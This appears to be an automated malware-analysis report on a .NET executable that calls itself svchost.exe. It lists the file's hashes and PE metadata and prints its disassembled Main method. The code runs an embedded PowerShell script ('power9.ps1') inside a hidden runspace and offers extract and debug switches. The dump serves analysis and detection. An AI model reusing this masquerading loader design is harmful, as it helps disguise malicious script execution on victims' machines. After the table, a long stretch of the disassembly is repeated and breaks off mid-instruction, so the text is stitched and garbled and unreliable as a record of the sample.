8fb788ba54fadf27b7597680b2d7ac6d
PE Executable | MD5: 8fb788ba54fadf27b7597680b2d7ac6d | Size: 49.16 KB | application/x-dosexec
Symbol Obfuscation Score
| Hash | Hash Value |
|---|---|
| MD5 | 8fb788ba54fadf27b7597680b2d7ac6d |
| Sha1 | 9c5d30ca6cf3bf05fc7361db526414da6ba30e33 |
| Sha256 | 4633c634b164c6cdd256415ae8a4ffecfd9a293d3d9cbe6ac6510da15034b375 |
| Sha384 | bb50b70a9b4039b8c36e455ac5e73b298451fcf43abf095b2923351ad07314a4772197d74444cf8b8e27d8a537983c26 |
| Sha512 | 42e3a4400dfc8e9c1586e7b2a5798507f43a472dddc415cb30abd7d4af49c15b0e497926ae10f82daa4ed72c9007485e4f31a7172cf5dc05f6c35247b67fd8ed |
| SSDeep | 384:GxysR3YvG1Ce83ggIMM/06WUz214dHRjQxqmlTW4gCwL1gb+PiGkxiEVjn:GwYdgwWedHdi3Iv1gbJ4EJ |
| TLSH | 3A2319187698C52DD23E4B7DA4A21A104677A33F121BEBC57CCC48AD2FB372845317AB |
PeID
| Name | Value |
|---|---|
| Info | PE Detect: PeReader FAIL, AsmResolver Mapped OK |
| Info | Remap: Mapped -> FileLayout (RAM only) as [Rebuild from dump]_438a2ed1.exe |
| Module Name | svchost.exe |
| Full Name | svchost.exe |
| EntryPoint | System.Int32 ModuleNameSpace.MainApp::Main(System.String[]) |
| Scope Name | svchost.exe |
| Scope Type | ModuleDef |
| Kind | Console |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | svchost |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 76 |
| Main Method | System.Int32 ModuleNameSpace.MainApp::Main(System.String[]) |
| Main IL Instruction Count | 568 |
| Main IL | ldnull <null> stloc.s V_26 ldnull <null> stloc.s V_27 ldnull <null> stloc.s V_28 newobj System.Void ModuleNameSpace.MainApp/<>c__DisplayClass8::.ctor() stloc.s V_29 newobj System.Void ModuleNameSpace.MainApp::.ctor() stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldsfld System.String System.String::Empty stloc.2 <null> ldloc.s V_29 newobj System.Void ModuleNameSpace.MainModuleUI::.ctor() stfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass8::ui ldloc.0 <null> ldloc.s V_29 ldfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass8::ui newobj System.Void ModuleNameSpace.MainModule::.ctor(ModuleNameSpace.MainAppInterface,ModuleNameSpace.MainModuleUI) stloc.3 <null> ldloc.s V_29 ldc.i4.0 <null> newobj System.Void System.Threading.ManualResetEvent::.ctor(System.Boolean) stfld System.Threading.ManualResetEvent ModuleNameSpace.MainApp/<>c__DisplayClass8::mre call System.AppDomain System.AppDomain::get_CurrentDomain() ldnull <null> ldftn System.Void ModuleNameSpace.MainApp::CurrentDomain_UnhandledException(System.Object,System.UnhandledExceptionEventArgs) newobj System.Void System.UnhandledExceptionEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler) ldloc.3 <null> call System.Management.Automation.Runspaces.Runspace System.Management.Automation.Runspaces.RunspaceFactory::CreateRunspace(System.Management.Automation.Host.PSHost) stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> callvirt System.Void System.Management.Automation.Runspaces.Runspace::set_ApartmentState(System.Threading.ApartmentState) ldloc.s V_4 callvirt System.Void System.Management.Automation.Runspaces.Runspace::Open() ldnull <null> stloc.s V_23 newobj System.Void ModuleNameSpace.MainApp/<>c__DisplayClassb::.ctor() stloc.s V_24 ldloc.s V_24 ldloc.s V_29 stfld ModuleNameSpace.MainApp/<>c__DisplayClass8 ModuleNameSpace.MainApp/<>c__DisplayClassb::CS$<>8__locals9 ldloc.s 
V_24 call System.Management.Automation.PowerShell System.Management.Automation.PowerShell::Create() stfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_23 brtrue.s IL_00A4: ldloc.s V_23 ldloc.s V_24 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClassb::<Main>b__0(System.Object,System.ConsoleCancelEventArgs) newobj System.Void System.ConsoleCancelEventHandler::.ctor(System.Object,System.IntPtr) stloc.s V_23 ldloc.s V_23 call System.Void System.Console::add_CancelKeyPress(System.ConsoleCancelEventHandler) ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_4 callvirt System.Void System.Management.Automation.PowerShell::set_Runspace(System.Management.Automation.Runspaces.Runspace) ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Management.Automation.PSDataStreams System.Management.Automation.PowerShell::get_Streams() callvirt System.Management.Automation.PSDataCollection`1<System.Management.Automation.ErrorRecord> System.Management.Automation.PSDataStreams::get_Error() ldloc.s V_26 brtrue.s IL_00DD: ldloc.s V_26 ldloc.s V_29 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass8::<Main>b__2(System.Object,System.Management.Automation.DataAddedEventArgs) newobj System.Void System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>::.ctor(System.Object,System.IntPtr) stloc.s V_26 ldloc.s V_26 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.ErrorRecord>::add_DataAdded(System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>) newobj System.Void System.Management.Automation.PSDataCollection`1<System.String>::.ctor() stloc.s V_5 call System.Boolean System.Console::get_IsInputRedirected() brfalse.s IL_010E: ldloc.s V_5 ldstr stloc.s V_6 br.s IL_0104: call System.String System.Console::ReadLine() 
ldloc.s V_5 ldloc.s V_6 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.String>::Add(System.String) call System.String System.Console::ReadLine() dup <null> stloc.s V_6 brtrue.s IL_00FB: ldloc.s V_5 ldloc.s V_5 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.String>::Complete() newobj System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>::.ctor() stloc.s V_7 ldloc.s V_7 ldloc.s V_27 brtrue.s IL_0131: ldloc.s V_27 ldloc.s V_29 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass8::<Main>b__3(System.Object,System.Management.Automation.DataAddedEventArgs) newobj System.Void System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>::.ctor(System.Object,System.IntPtr) stloc.s V_27 ldloc.s V_27 callvirt System.Void System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>::add_DataAdded(System.EventHandler`1<System.Management.Automation.DataAddedEventArgs>) ldc.i4.0 <null> stloc.s V_8 ldc.i4.0 <null> stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 ldstr stloc.s V_11 ldarg.0 <null> stloc.s V_31 ldc.i4.0 <null> stloc.s V_32 br IL_0257: ldloc.s V_32 ldloc.s V_31 ldloc.s V_32 ldelem.ref <null> stloc.s V_12 ldloc.s V_12 ldstr -wait ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_0170: ldloc.s V_12 ldc.i4.1 <null> stloc.1 <null> br IL_024B: ldloc.s V_9 ldloc.s V_12 ldstr -extract ldc.i4.3 <null> callvirt System.Boolean System.String::StartsWith(System.String,System.StringComparison) brfalse.s IL_01D2: ldloc.s V_12 ldloc.s V_12 ldc.i4.1 <null> newarr System.String stloc.s V_33 ldloc.s V_33 ldc.i4.0 <null> ldstr : stelem.ref <null> ldloc.s V_33 ldc.i4.2 <null> ldc.i4.1 <null> callvirt System.String[] System.String::Split(System.String[],System.Int32,System.StringSplitOptions) stloc.s V_13 ldloc.s V_13 ldlen <null> conv.i4 <null> ldc.i4.2 <null> beq.s IL_01B6: ldloc.s V_13 
ldstr If you specify the -extract option you need to add a file for extraction in this way -extract:"<filename>" call System.Void System.Console::WriteLine(System.String) ldc.i4.1 <null> stloc.s V_30 leave IL_065A: ldloc.s V_30 ldloc.s V_13 ldc.i4.1 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char stloc.s V_34 ldloc.s V_34 ldc.i4.0 <null> ldc.i4.s 34 stelem.i2 <null> ldloc.s V_34 callvirt System.String System.String::Trim(System.Char[]) stloc.2 <null> br.s IL_024B: ldloc.s V_9 ldloc.s V_12 ldstr -end ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_01E9: ldloc.s V_12 ldloc.s V_9 ldc.i4.1 <null> add <null> stloc.s V_8 br.s IL_0262: call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_12 ldstr -? ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_01FD: ldloc.s V_10 ldc.i4.1 <null> stloc.s V_10 br.s IL_024B: ldloc.s V_9 ldloc.s V_10 brfalse.s IL_0234: ldloc.s V_12 ldloc.s V_12 ldstr -detailed ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brfalse.s IL_022E: ldloc.s V_12 ldloc.s V_12 ldstr -examples ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brfalse.s IL_022E: ldloc.s V_12 ldloc.s V_12 ldstr -full ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_024B: ldloc.s V_9 ldloc.s V_12 stloc.s V_11 br.s IL_024B: ldloc.s V_9 ldloc.s V_12 ldstr -debug ldc.i4.1 <null> call System.Int32 System.String::Compare(System.String,System.String,System.Boolean) brtrue.s IL_024B: ldloc.s V_9 call System.Boolean System.Diagnostics.Debugger::Launch() pop <null> br.s IL_0262: call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_9 ldc.i4.1 <null> add <null> stloc.s V_9 ldloc.s V_32 ldc.i4.1 <null> add <null> 
stloc.s V_32 ldloc.s V_32 ldloc.s V_31 ldlen <null> conv.i4 <null> blt IL_0153: ldloc.s V_31 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() stloc.s V_14 ldloc.s V_14 ldstr power9.ps1 callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.s V_15 ldloc.s V_15 call System.Text.Encoding System.Text.Encoding::get_UTF8() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream,System.Text.Encoding) stloc.s V_16 ldloc.s V_16 callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_17 ldloc.2 <null> call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_02A6: ldloc.s V_10 ldloc.2 <null> ldloc.s V_17 call System.Void System.IO.File::WriteAllText(System.String,System.String) ldc.i4.0 <null> stloc.s V_30 leave IL_065A: ldloc.s V_30 ldloc.s V_10 brfalse.s IL_031E: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldc.i4.s 9 newarr System.String stloc.s V_35 ldloc.s V_35 ldc.i4.0 <null> ldstr function stelem.ref <null> ldloc.s V_35 ldc.i4.1 <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() stelem.ref <null> ldloc.s V_35 ldc.i4.2 <null> ldstr { stelem.ref <null> ldloc.s V_35 ldc.i4.3 <null> ldloc.s V_17 stelem.ref <null> ldloc.s V_35 ldc.i4.4 <null> ldstr }; Get-Help stelem.ref <null> ldloc.s V_35 ldc.i4.5 <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_FriendlyName() stelem.ref <null> ldloc.s V_35 ldc.i4.6 <null> ldstr stelem.ref <null> ldloc.s V_35 ldc.i4.7 <null> ldloc.s V_11 stelem.ref <null> ldloc.s V_35 ldc.i4.8 <null> ldstr | Out-String stelem.ref <null> ldloc.s V_35 call System.String System.String::Concat(System.String[]) callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddScript(System.String) pop 
<null> br.s IL_032D: leave.s IL_033B ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_17 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddScript(System.String) pop <null> leave.s IL_033B: leave.s IL_0349 ldloc.s V_16 brfalse.s IL_033A: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0349: ldloc.s V_10 ldloc.s V_15 brfalse.s IL_0348: endfinally ldloc.s V_15 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_10 brtrue IL_0575: ldloc.s V_24 ldnull <null> stloc.s V_18 ldstr ^-([^: ]+)[ :]?([^:]*)$ newobj System.Void System.Text.RegularExpressions.Regex::.ctor(System.String) stloc.s V_19 ldloc.s V_8 stloc.s V_20 br IL_0534: ldloc.s V_20 ldloc.s V_19 ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> callvirt System.Text.RegularExpressions.Match System.Text.RegularExpressions.Regex::Match(System.String) stloc.s V_21 ldloc.s V_21 callvirt System.Boolean System.Text.RegularExpressions.Group::get_Success() brfalse IL_0501: ldloc.s V_18 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() callvirt System.Int32 System.Text.RegularExpressions.GroupCollection::get_Count() ldc.i4.3 <null> bne.un IL_0501: ldloc.s V_18 ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> ldloca.s V_22 call System.Boolean System.Double::TryParse(System.String,System.Double&) brtrue IL_0501: ldloc.s V_18 ldloc.s V_18 brfalse.s IL_03B6: ldloc.s V_21 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_18 callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt 
System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::Trim() ldstr call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_03F2: ldloc.s V_21 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() stloc.s V_18 br IL_052E: ldloc.s V_20 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0433: ldloc.s V_24 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::ToUpper() ldstr $TRUE call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0460: ldloc.s V_21 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group 
System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldc.i4.1 <null> box System.Boolean callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br IL_052E: ldloc.s V_20 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldstr False call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_04A1: ldloc.s V_24 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::ToUpper() ldstr $FALSE call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_04CB: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldc.i4.0 <null> box System.Boolean callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br.s IL_052E: ldloc.s V_20 ldloc.s 
V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br.s IL_052E: ldloc.s V_20 ldloc.s V_18 brfalse.s IL_051D: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_18 ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br.s IL_052E: ldloc.s V_20 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddArgument(System.Object) pop <null> ldloc.s V_20 ldc.i4.1 <null> add <null> stloc.s V_20 ldloc.s V_20 ldarg.0 <null> ldlen <null> conv.i4 <null> blt IL_0368: ldloc.s V_19 ldloc.s V_18 brfalse.s IL_0551: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_18 callvirt System.Management.Automation.PowerShell 
System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldstr Out-String callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddCommand(System.String) pop <null> ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldstr Stream callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_5 ldloc.s V_7 ldnull <null> ldloc.s V_28 brtrue.s IL_0594: ldloc.s V_28 ldloc.s V_29 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass8::<Main>b__4(System.IAsyncResult) newobj System.Void System.AsyncCallback::.ctor(System.Object,System.IntPtr) stloc.s V_28 ldloc.s V_28 ldnull <null> callvirt System.IAsyncResult System.Management.Automation.PowerShell::BeginInvoke<System.String,System.Management.Automation.PSObject>(System.Management.Automation.PSDataCollection`1<System.String>,System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>,System.Management.Automation.PSInvocationSettings,System.AsyncCallback,System.Object) pop <null> ldloc.0 <null> callvirt System.Boolean ModuleNameSpace.MainApp::get_ShouldExit() brtrue.s IL_05B5: ldloc.s V_24 ldloc.s V_29 ldfld System.Threading.ManualResetEvent ModuleNameSpace.MainApp/<>c__DisplayClass8::mre ldc.i4.s 100 callvirt System.Boolean System.Threading.WaitHandle::WaitOne(System.Int32) brfalse.s IL_059D: ldloc.0 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Void System.Management.Automation.PowerShell::Stop() ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt 
System.Management.Automation.PSInvocationStateInfo System.Management.Automation.PowerShell::get_InvocationStateInfo() callvirt System.Management.Automation.PSInvocationState System.Management.Automation.PSInvocationStateInfo::get_State() ldc.i4.5 <null> bne.un.s IL_05F7: leave.s IL_060F ldloc.s V_29 ldfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass8::ui ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Management.Automation.PSInvocationStateInfo System.Management.Automation.PowerShell::get_InvocationStateInfo() callvirt System.Exception System.Management.Automation.PSInvocationStateInfo::get_Reason() callvirt System.String System.Exception::get_Message() callvirt System.Void System.Management.Automation.Host.PSHostUserInterface::WriteErrorLine(System.String) leave.s IL_060F: ldloc.s V_4 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh brfalse.s IL_060E: endfinally ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_4 callvirt System.Void System.Management.Automation.Runspaces.Runspace::Close() leave.s IL_0624: leave.s IL_0640 ldloc.s V_4 brfalse.s IL_0623: endfinally ldloc.s V_4 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0640: ldloc.1 stloc.s V_25 ldstr An exception occured: call System.Void System.Console::Write(System.String) ldloc.s V_25 callvirt System.String System.Exception::get_Message() call System.Void System.Console::WriteLine(System.String) leave.s IL_0640: ldloc.1 ldloc.1 <null> brfalse.s IL_0653: ldloc.0 ldstr Hit any key to exit... 
call System.Void System.Console::WriteLine(System.String) call System.ConsoleKeyInfo System.Console::ReadKey() pop <null> ldloc.0 <null> callvirt System.Int32 ModuleNameSpace.MainApp::get_ExitCode() ret <null> ldloc.s V_30 ret <null> |
System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::Trim() ldstr call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_03F2: ldloc.s V_21 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() stloc.s V_18 br IL_052E: ldloc.s V_20 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_0433: ldloc.s V_24 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::ToUpper() ldstr $TRUE call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0460: ldloc.s V_21 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group 
System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldc.i4.1 <null> box System.Boolean callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br IL_052E: ldloc.s V_20 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldstr False call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_04A1: ldloc.s V_24 ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.String System.String::ToUpper() ldstr $FALSE call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_04CB: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldc.i4.0 <null> box System.Boolean callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br.s IL_052E: ldloc.s V_20 ldloc.s 
V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.1 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() ldloc.s V_21 callvirt System.Text.RegularExpressions.GroupCollection System.Text.RegularExpressions.Match::get_Groups() ldc.i4.2 <null> callvirt System.Text.RegularExpressions.Group System.Text.RegularExpressions.GroupCollection::get_Item(System.Int32) callvirt System.String System.Text.RegularExpressions.Capture::get_Value() callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br.s IL_052E: ldloc.s V_20 ldloc.s V_18 brfalse.s IL_051D: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_18 ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String,System.Object) pop <null> ldnull <null> stloc.s V_18 br.s IL_052E: ldloc.s V_20 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldarg.0 <null> ldloc.s V_20 ldelem.ref <null> callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddArgument(System.Object) pop <null> ldloc.s V_20 ldc.i4.1 <null> add <null> stloc.s V_20 ldloc.s V_20 ldarg.0 <null> ldlen <null> conv.i4 <null> blt IL_0368: ldloc.s V_19 ldloc.s V_18 brfalse.s IL_0551: ldloc.s V_24 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_18 callvirt System.Management.Automation.PowerShell 
